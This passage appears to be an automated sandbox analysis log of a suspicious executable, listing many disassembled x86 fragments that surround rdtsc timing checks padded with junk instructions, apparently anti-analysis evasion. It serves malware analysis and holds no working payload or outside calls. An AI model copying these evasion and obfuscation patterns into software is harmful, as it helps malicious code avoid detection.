Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C22D7 second address: 12C22DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C22DD second address: 12C22FD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1F81013DB0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C31E8 second address: 12C31EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C31EC second address: 12C320D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 clc 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d jp 00007F1F81013DA9h 0x00000013 movsx edi, di 0x00000016 push eax 0x00000017 je 00007F1F81013DB0h 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C41BB second address: 12C4236 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1F80D7764Dh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F1F80D77652h 0x0000001a nop 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D2A84h], esi 0x00000022 popad 0x00000023 jp 00007F1F80D7764Ch 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F1F80D77648h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov di, bx 0x00000048 push 00000000h 0x0000004a mov edi, 7ADA8F62h 0x0000004f mov edi, eax 0x00000051 xchg eax, esi 0x00000052 push esi 0x00000053 jc 00007F1F80D7764Ch 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C9189 second address: 12C9201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007F1F81013DB1h 0x0000000b jmp 00007F1F81013DABh 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F1F81013DA8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F1F81013DA8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a cld 0x0000004b push 00000000h 0x0000004d xor edi, dword ptr [ebp+122D3658h] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push ebx 0x00000057 ja 00007F1F81013DA6h 0x0000005d pop ebx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C9201 second address: 12C920B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F1F80D77646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C60CA second address: 12C60CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C5229 second address: 12C522D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C522D second address: 12C5231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C8470 second address: 12C84A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77656h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1F80D77653h 0x0000000e popad 0x0000000f push eax 0x00000010 push edi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C934D second address: 12C9353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CC036 second address: 12CC03C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CC862 second address: 12CC87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1F81013DB2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CD668 second address: 12CD678 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CD678 second address: 12CD67D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CD67D second address: 12CD683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5037 second address: 12D5043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5043 second address: 12D506E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F1F80D7764Eh 0x0000000e jmp 00007F1F80D77650h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1262616 second address: 126261A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DD754 second address: 12DD759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276AB3 second address: 1276AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276AB9 second address: 1276AC3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F80D77646h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276AC3 second address: 1276AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1F81013DB0h 0x0000000c jmp 00007F1F81013DB3h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jp 00007F1F81013DA6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276AFF second address: 1276B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1F80D77653h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276B17 second address: 1276B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276B1D second address: 1276B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1F80D77646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E2CBA second address: 12E2CCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E2FAC second address: 12E2FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E33B0 second address: 12E33C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DABh 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E33C3 second address: 12E33CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E94EA second address: 12E94F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E94F3 second address: 12E94F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E94F9 second address: 12E950D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B99F7 second address: 12969C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F1F80D77648h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 sbb cl, 00000050h 0x00000025 call dword ptr [ebp+12455546h] 0x0000002b jnl 00007F1F80D77658h 0x00000031 push eax 0x00000032 push edx 0x00000033 jng 00007F1F80D77646h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B9E55 second address: 12B9E5B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B9E5B second address: 12B9E60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B9F22 second address: 12B9F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B9F28 second address: 12B9F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA03A second address: 12BA03E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA03E second address: 12BA049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA049 second address: 12BA057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA1E8 second address: 12BA1EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA1EC second address: 12BA1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA1F6 second address: 12BA20D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c mov edi, 269FCED3h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA20D second address: 12BA214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA338 second address: 12BA33C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA33C second address: 12BA346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA346 second address: 12BA34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA34A second address: 12BA34E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA508 second address: 12BA581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F1F80D77648h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov ecx, dword ptr [ebp+1245E88Fh] 0x0000002d jmp 00007F1F80D77655h 0x00000032 push 00000004h 0x00000034 jmp 00007F1F80D77654h 0x00000039 nop 0x0000003a ja 00007F1F80D77650h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jne 00007F1F80D77648h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA8EF second address: 12BA953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F81013DAFh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F1F81013DA8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 0000001Eh 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F1F81013DA8h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 add dword ptr [ebp+1244A6BAh], edx 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f pushad 0x00000050 popad 0x00000051 pop edi 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BA953 second address: 12BA961 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BAD54 second address: 1297542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1F81013DA6h 0x0000000a popad 0x0000000b nop 0x0000000c sub dx, 3493h 0x00000011 lea eax, dword ptr [ebp+12488762h] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F1F81013DA8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 xor edx, dword ptr [ebp+122D3668h] 0x00000037 push ecx 0x00000038 call 00007F1F81013DACh 0x0000003d call 00007F1F81013DAAh 0x00000042 pop edi 0x00000043 pop ecx 0x00000044 pop edx 0x00000045 push eax 0x00000046 jmp 00007F1F81013DB4h 0x0000004b mov dword ptr [esp], eax 0x0000004e sub dword ptr [ebp+122D1AA7h], esi 0x00000054 lea eax, dword ptr [ebp+1248871Eh] 0x0000005a pushad 0x0000005b je 00007F1F81013DACh 0x00000061 jnp 00007F1F81013DA6h 0x00000067 popad 0x00000068 push eax 0x00000069 jmp 00007F1F81013DB0h 0x0000006e mov dword ptr [esp], eax 0x00000071 movzx edx, ax 0x00000074 call dword ptr [ebp+122D2402h] 0x0000007a pushad 0x0000007b jmp 00007F1F81013DB9h 0x00000080 jne 00007F1F81013DAEh 0x00000086 push eax 0x00000087 push edx 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1297542 second address: 1297548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E896E second address: 12E8980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F1F81013DABh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8980 second address: 12E8986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8986 second address: 12E8999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F1F81013DA6h 0x0000000d jg 00007F1F81013DA6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8999 second address: 12E899F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8B07 second address: 12E8B0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8B0B second address: 12E8B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8B11 second address: 12E8B28 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 jbe 00007F1F81013DA6h 0x0000000f jns 00007F1F81013DA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8C76 second address: 12E8C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8C81 second address: 12E8C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8C85 second address: 12E8C90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8DD1 second address: 12E8DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8DD9 second address: 12E8DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E8DDD second address: 12E8DE9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007F1F81013DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1297538 second address: 1297542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E9071 second address: 12E908F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007F1F81013DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1F81013DACh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E908F second address: 12E9093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E9093 second address: 12E909D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EAC28 second address: 12EAC2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EAC2E second address: 12EAC34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EAC34 second address: 12EAC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F80D7764Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12ED92F second address: 12ED949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DB6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F0B1C second address: 12F0B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F0B20 second address: 12F0B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB9h 0x00000007 jmp 00007F1F81013DB9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F0B5C second address: 12F0B66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F6636 second address: 12F663D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F663D second address: 12F6647 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1F80D7764Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F4FDF second address: 12F4FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F4FF7 second address: 12F5014 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1F80D7764Dh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5014 second address: 12F5018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F517E second address: 12F5182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5182 second address: 12F5186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F5461 second address: 12F5465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
